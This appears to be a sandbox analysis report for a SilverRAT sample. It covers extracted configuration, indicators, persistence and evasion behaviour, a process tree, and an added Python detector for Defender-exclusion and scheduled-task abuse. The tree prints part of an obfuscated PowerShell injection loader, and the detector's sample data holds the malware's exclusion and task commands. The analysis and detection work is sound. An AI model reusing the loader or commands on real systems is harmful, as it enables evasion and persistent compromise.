Analysis
max time kernel: 90s
max time network: 90s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-11-2024 04:24
Static task: static1
Behavioral task: behavioral1
Sample: Sex.exe
Resource: win10v2004-20241007-en
General
Target: Sex.exe
Size: 8KB
MD5: e618f84aafa47620606982c4abbc7d67
SHA1: 6f6e1f34130d3468da33ce0cadebddfce494255b
SHA256: ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747
SHA512: a5de82399c37e6441edbca72899588c5cbf5574968a81a2a4fe02aa5101a51a4c7b07219c92f10255005f2c8fe6abb66e1d493942e7757b6dfd0c318eb01b704
SSDEEP: 96:zdXT3QNm17yCqN1BN3CyvI35R0k7+AmRuPKuHVlXxdbyIzNt:xrX7yCqDyyvYv+Am4PHVlXnyK
Malware Config
Extracted
Family: silverrat
Version: 1.0.0.0
Mutex: SilverMutex_GAZUkcCGjo
certificate: (omitted from this page)
decrypted_key: -|S.S.S|-
key: yy6zDjAUmbB09pKvo5Hhug==
key_x509: c0pTT0F4YUlWdnprRUZXU0lZck5EUEdMcFJ1UnpG
reconnect_delay: 4
server_signature: (omitted from this page)
Signatures
Silverrat family
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 3520 created 612 | 3520 | powershell.EXE | 5
Command and Scripting Interpreter: PowerShell 3 IoCs
pid | Process
3520 | powershell.EXE
2688 | powershell.exe
3960 | powershell.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments. wmiprvse.exe is the WMI provider host: these reads were made through WMI on behalf of another process, which this table does not identify.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | Sex.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | svClient.exe
Executes dropped EXE 3 IoCs
pid | Process
1164 | svClient.exe
3132 | sv.exe
2380 | svClient.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\svClient\\svClient.exe\"" | svClient.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow | ioc
18 | raw.githubusercontent.com
30 | pastebin.com
3 | pastebin.com
4 | pastebin.com
7 | pastebin.com
17 | raw.githubusercontent.com
Drops file in System32 directory 11 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\svClient.exe | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\svClient_Task-HOURLY-01 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | svchost.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 3520 set thread context of 4584 | 3520 | powershell.EXE | 102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | pow
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Sex.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments. Note the QEMU vendor string in the CD-ROM device path below: that is exactly the kind of virtualisation artefact such checks look for.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | wmiprvse.exe
Delays execution with timeout.exe 1 IoCs
pid | Process
2476 | timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Modifies data under HKEY_USERS 42 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3004 | schtasks.exe
1220 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (64 rows on the original page, collapsed here to the distinct pairs; most rows are 1164 svClient.exe and 4584 dllhost.exe)
1164 | svClient.exe
2688 | powershell.exe
3960 | powershell.exe
3520 | powershell.EXE
4584 | dllhost.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process (64 rows collapsed to distinct entries; the svchost.exe 2128 set is one privilege cycle that repeats)
Token: SeDebugPrivilege | 3188 | Sex.exe
Token: SeDebugPrivilege | 1164 | svClient.exe
Token: SeDebugPrivilege | 2688 | powershell.exe
Token: SeDebugPrivilege | 3960 | powershell.exe
Token: SeDebugPrivilege | 3520 | powershell.EXE
Token: SeDebugPrivilege | 4584 | dllhost.exe
Token: SeDebugPrivilege | 2380 | svClient.exe
Token: SeShutdownPrivilege | 3424 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3424 | Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege | 2128 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2128 | svchost.exe
Token: SeSecurityPrivilege | 2128 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2128 | svchost.exe
Token: SeLoadDriverPrivilege | 2128 | svchost.exe
Token: SeSystemtimePrivilege | 2128 | svchost.exe
Token: SeBackupPrivilege | 2128 | svchost.exe
Token: SeRestorePrivilege | 2128 | svchost.exe
Token: SeShutdownPrivilege | 2128 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2128 | svchost.exe
Token: SeUndockPrivilege | 2128 | svchost.exe
Token: SeManageVolumePrivilege | 2128 | svchost.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
2380 | svClient.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (repeated rows collapsed; repeat count in parentheses)
PID 3188 wrote to memory of 1164 | 3188 | Sex.exe | 87 (x2)
PID 3188 wrote to memory of 2688 | 3188 | Sex.exe | 88 (x3)
PID 3188 wrote to memory of 3132 | 3188 | Sex.exe | 97 (x3)
PID 3188 wrote to memory of 3960 | 3188 | Sex.exe | 98 (x3)
PID 3520 wrote to memory of 4584 | 3520 | powershell.EXE | 102 (x8)
PID 4584 (dllhost.exe) wrote to the memory of each of the following PIDs once (procid_target in parentheses), i.e. nearly every other process in the tree: 612 (5), 668 (7), 956 (12), 316 (13), 508 (14), 952 (16), 1064 (17), 1084 (18), 1176 (19), 1208 (20), 1244 (21), 1316 (22), 1380 (23), 1388 (24), 1400 (25), 1420 (26), 1580 (27), 1604 (28), 1676 (29), 1724 (30), 1800 (31), 1808 (32), 1936 (33), 2000 (34), 2012 (35), 1756 (36), 2112 (37), 2128 (38), 2224 (40), 2308 (41), 2440 (42), 2448 (43), 2652 (44), 2664 (45), 2696 (46), 2732 (47), 2788 (48), 2796 (49), 2804 (50), 2912 (51), 2984 (52), 752 (53), 3292 (55), 3424 (56), 3548 (57)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
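The signatures above record the chain one event at a time: Defender exclusions added through PowerShell, two schtasks creations (one with /RL HIGHEST pointing into the user profile, one whose /tr is the unexpanded %MyFile%), and system utilities spawned by binaries running out of C:\Users\Public and C:\Users\Admin. The following added example, which is not part of the sandbox report, scores process-creation events for exactly that chain. SAMPLE_EVENTS is constructed from the command lines in the process tree; ProcEvent, Finding and the check names are this example's own.

```python
"""Added example (not part of the sandbox report): flag the defence-evasion and
persistence chain this report records, from process-creation events (image,
command line, parent image: what Sysmon Event ID 1 or Security 4688 provide).
SAMPLE_EVENTS is constructed from the process tree; ProcEvent, Finding and the
check names are this example's own."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Paths a standard user can write to: a task or autorun target here is under
# attacker control rather than part of an installed product.
USER_WRITABLE = re.compile(
    r"^(C:\\Users\\|C:\\ProgramData\\|%(TEMP|TMP|APPDATA|LOCALAPPDATA|PUBLIC)%)", re.I)
LOLBINS = {"schtasks.exe", "powershell.exe", "cmd.exe", "timeout.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


@dataclass(frozen=True)
class Finding:
    pid: int
    ttp: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def task_target(cmdline: str) -> str | None:
    """Program named by schtasks /TR. Accepts the quoted form with backslash-escaped
    inner quotes seen here; the first token of the value is the image that will run."""
    m = re.search(r'/tr\s+(?:"((?:[^"\\]|\\.)*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    return raw.split(" ", 1)[0].strip('"')


def check_defender_exclusion(ev: ProcEvent) -> Finding | None:
    """T1562.001: Add-MpPreference -Exclusion* run through PowerShell."""
    if _basename(ev.image) != "powershell.exe":
        return None
    m = re.search(r"""Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+['"]?([^'"]+)""",
                  ev.cmdline, re.I)
    return Finding(ev.pid, "T1562.001 Defender exclusion", f"{m.group(1)}={m.group(2)}") if m else None


def check_schtasks_create(ev: ProcEvent) -> Finding | None:
    """T1053.005: task creation that runs elevated, targets a user path, or an unexpanded %VAR%."""
    if _basename(ev.image) != "schtasks.exe" or not re.search(r"/create\b", ev.cmdline, re.I):
        return None
    target = task_target(ev.cmdline) or "?"
    reasons = []
    if re.search(r"/rl\s+highest", ev.cmdline, re.I):
        reasons.append("runs with highest privileges")
    if USER_WRITABLE.match(target):
        reasons.append("target in user-writable path")
    if re.fullmatch(r"%[^%]+%", target):
        reasons.append("target is an unexpanded environment variable")
    return Finding(ev.pid, "T1053.005 scheduled task", f"{target}: {'; '.join(reasons)}") if reasons else None


def check_lolbin_from_user_writable(ev: ProcEvent) -> Finding | None:
    """System utility launched by something running out of a user-writable directory."""
    if _basename(ev.image) in LOLBINS and USER_WRITABLE.match(ev.parent_image):
        return Finding(ev.pid, "LOLBin from user-writable parent",
                       f"{_basename(ev.parent_image)} -> {_basename(ev.image)}")
    return None


CHECKS = (check_defender_exclusion, check_schtasks_create, check_lolbin_from_user_writable)


def scan(events) -> list[Finding]:
    return [f for ev in events for chk in CHECKS if (f := chk(ev)) is not None]


# Constructed from this report's process tree (PIDs, images and parents as listed there).
SYS = "C:\\Windows\\system32\\"
DROPPER = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sex.exe"
PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
SVC_USER = "C:\\Users\\Admin\\svClient\\svClient.exe"
SAMPLE_EVENTS = (
    ProcEvent(2688, PS32, "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:\\Users\\Public\\svClient.exe'", DROPPER),
    ProcEvent(3960, PS32, "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:\\Users\\Public\\sv.exe'", DROPPER),
    ProcEvent(448, SYS + "cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1383.tmp.bat""',
              "C:\\Users\\Public\\svClient.exe"),
    ProcEvent(2476, SYS + "timeout.exe", "timeout 3", SYS + "cmd.exe"),
    ProcEvent(4864, SYS + "schtasks.exe", '"schtasks.exe" /query /TN svClient.exe', SVC_USER),
    ProcEvent(3004, SYS + "schtasks.exe", r'"schtasks.exe" /Create /SC ONCE /TN "svClient.exe" /TR "C:\Users\Admin\svClient\svClient.exe \"\svClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST', SVC_USER),
    ProcEvent(1220, SYS + "schtasks.exe", r'"C:\Windows\System32\schtasks.exe" /create /sc hourly /mo 1 /tn "svClient_Task-HOURLY-01" /tr "%MyFile%" /st 00:00', SVC_USER),
    ProcEvent(1176, SYS + "svchost.exe", SYS + "svchost.exe -k netsvcs -p -s Schedule", SYS + "services.exe"),
)

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid:<5} {f.ttp:<32} {f.detail}")
```

The benign controls (timeout.exe under a system32 cmd.exe, the Schedule service host under services.exe) produce no findings; the two Defender exclusions, both task creations and every utility spawned from the dropper's or the copied client's directory do. The parent-path check is deliberately coarse: on its own it is noisy (installers and updaters trip it), so in practice it serves as a correlation feature next to the other two rather than an alert by itself.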
Processes
Process tree as recorded by the sandbox. Each line is [depth] image | command line | PID; the signatures a process triggered are listed beneath it.
[1] C:\Windows\system32\winlogon.exe | winlogon.exe | PID 612
  [2] C:\Windows\system32\dwm.exe | "dwm.exe" | PID 316
  [2] C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{bac40e51-09ee-4729-9154-41c22f77609c} | PID 4584
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
[1] C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 668
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 956
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 508
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 952
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID 1064
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID 1084
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1176
  - Drops file in System32 directory
  [2] C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID 2912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yZJanTwbuUYg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wDUFYRrQaOxVrt,[Parameter(Position=1)][Type]$YFnakGISxb)$ffcxsYmXiHF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+'s'+','+''+'P'+'ubl'+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+'d'+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ffcxsYmXiHF.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'p'+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Sig'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wDUFYRrQaOxVrt).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+'a'+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$ffcxsYmXiHF.DefineMethod('Inv'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'li'+[Char](99)+''+','+'Hid'+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+'g'+[Char](44
)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+'lo'+'t'+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+'al',$YFnakGISxb,$wDUFYRrQaOxVrt).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+'ged');Write-Output $ffcxsYmXiHF.CreateType();}$oZCKWVmKBnBvx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+'ro'+[Char](115)+''+'o'+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+'a'+[Char](116)+''+'i'+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$wJCtIddCwFSxtB=$oZCKWVmKBnBvx.GetMethod(''+[Char](71)+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+'A'+'dd'+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c'+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CNOqMpRayuiitoTsPex=yZJanTwbuUYg @([String])([IntPtr]);$bMFkmqrwOPqwzSeAQoRvao=yZJanTwbuUYg 
